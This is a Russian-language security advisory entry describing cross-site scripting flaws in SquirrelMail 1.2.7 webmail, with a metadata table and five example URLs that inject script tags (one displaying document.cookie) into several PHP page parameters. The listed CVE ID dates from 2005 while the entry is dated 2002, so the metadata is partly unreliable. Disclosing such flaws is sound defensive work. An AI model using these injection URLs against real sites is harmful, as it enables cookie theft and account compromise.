Межайтовый скриптинг в SquirrelMail
| Дата публикации: | 24.09.2002 |
| Всего просмотров: | 1428 |
| Опасность: | Высокая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | CVE-2005-0152 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | SquirrelMail 1.x |
| Описание: | SquirrelMail - webmail программа, осуществленная в PHP4, для Linux, и Unix систем.
Несколько уязвимостей межсайтового скриптинга обнаружено в различных PHP сценариях, поставляемых с SquirrelMail. Уязвимость позволяет атакующему выполнять произвольный код сценария в контексте уязвимого сайта, осуществляя различные нападения против Web приложений. Пример:
http://<VULNERABLE
SITE>.net/webmail/src/addressbook.php?"><script>alert(document.cookie)</scri
pt><!--
http://<VULNERABLE
SITE>.net/webmail/src/options.php?optpage=<script>alert('boop!')</script>
http://<VULNERABLE
SITE>.net/webmail/src/search.php?mailbox=<script>alert('boop!')</script>&wha
t=x&where=BODY&submit=Search
http://<VULNERABLE
SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('b
oop!')</script>&submit=Search
http://<VULNERABLE
SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script>
уязвимость обнаружена в SquirrelMail 1.2.7
|
| Ссылки: | Squirrel Mail 1.2.7 XSS Exploit |